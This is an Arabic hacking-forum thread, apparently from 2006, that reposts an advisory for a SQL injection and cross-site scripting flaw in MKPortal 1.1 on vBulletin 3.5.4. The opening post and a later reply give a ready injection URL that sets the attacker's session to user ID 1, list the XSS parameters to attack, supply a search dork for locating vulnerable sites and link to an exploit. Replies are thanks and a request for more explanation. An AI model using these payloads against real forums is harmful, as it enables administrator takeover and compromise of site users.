ضع اعلانك هنا

ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > مكتبة الثغرات
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
مكتبة الثغرات ثغرات المواقع , ثغرات المنتديات ثغرات الأنظمة ثغرات مجلات , ثغرات البرامج و كيفية الاستغلال ,windows, linux, freebsd, DoS, Kernel, Local, buffer, overflow, auditing, spoofing, sniffer, sniffing, vulnerability, exploit
 

vBulletin 3.5.4 with MKPortal 1.1 Remote SQL

مكتبة الثغرات


إضافة رد
 
LinkBack أدوات الموضوع
 
قديم 04-25-2006, 05:06 AM   #1 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي vBulletin 3.5.4 with MKPortal 1.1 Remote SQL

السلام عليكم ورحمة الله




الثغره في منتديات vBulletin 3.5.4

الي مركب مجلة المنتديات MKPortal 1.1

Advisory: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:36 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
about: Via this methods remote attacker can inject arbitrary SQL queries to
ind parameter in index.php of MKPortal.
Vulnerable code can be found in the file
mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it
easy to
by pass this SQL update function.
Also there is cross-site scripting vulnerability in pm_popup.php the
parameters u1,m1,m2,m3,m4 did not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection :

GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL]
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example remote attacker updates his session's userid to 1 and
after *******ing the page he can logs as userid 1.

XSS:
GET ->

http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=26
---
Dorks: "MKPortal 1.1 RC1"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=26

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 04-28-2006, 05:37 AM   #2 (permalink)
عضو فعال
 
الصورة الرمزية shokre






shokre غير متصل

shokre will become famous soon enoughshokre will become famous soon enough

افتراضي مشاركة: vBulletin 3.5.4 with MKPortal 1.1 Remote SQL

تحياتي لك وشكراً علي المواضيع المهمه وإنشاء الله الكل يستفيد

التوقيع



متي نقوم من سباتنا العمييييييييييييييييق

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 05-04-2006, 06:03 PM   #3 (permalink)
عضو فعال
 
الصورة الرمزية المدمر4000






المدمر4000 غير متصل

المدمر4000 will become famous soon enoughالمدمر4000 will become famous soon enough

افتراضي مشاركة: vBulletin 3.5.4 with MKPortal 1.1 Remote SQL

مشكووووووووووووور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 05-13-2006, 02:06 PM   #4 (permalink)
عضو جديد






mahmood_ali غير متصل

mahmood_ali will become famous soon enoughmahmood_ali will become famous soon enough

افتراضي مشاركة: vBulletin 3.5.4 with MKPortal 1.1 Remote SQL

مشكور يا أستاذ Xp بس

ياريت توضح لنا الثغرة

جزاك الله كل خير


:: محمود ::

التوقيع

// التجربة طريق الإبداع ... وليس لي الإبداع حدود //
// Mahmood Was Here //
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 05-13-2006, 04:10 PM   #5 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي مشاركة: vBulletin 3.5.4 with MKPortal 1.1 Remote SQL

يسلمو خواني على المرور

الثغره في الي مركب المجله على الاصدار vBulletin 3.5.4

اسم المجله

MKPortal 1.1

وهذي الاستثمارات

GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL]
EXAMPLE ->

http://[victim]/[mkportaldir]/index.php?ind=',userid='1


http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد





الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Sql إسكيوإل مش حتصدق the_a_n_g أمن المواقع والسيرفرات 16 10-25-2008 02:43 PM
ثغرة منتديات vBulletin 3.5.4 زعيم الإحساس مكتبة الثغرات 4 02-24-2007 07:32 PM
CascadianFAQ = 4.1 (index.php) Remote Blind SQL Injection Vulnerability الماستر فؤاد مكتبة الثغرات 1 02-14-2007 03:18 AM
ثغرة أمنية Script SQL Injection في صفحة التقويم لمنتديات vBulletin KANE مكتبة الثغرات 1 08-29-2006 09:18 AM
Discovery is credit to mslug VBulletin XP مكتبة الثغرات 4 08-05-2006 06:08 PM


الساعة الآن 10:00 PM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نطاقات نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى


الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج | الفيجوال بيسك | المواضيع العامه | القصص واللغات|  شات


Powered by vBulletin Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58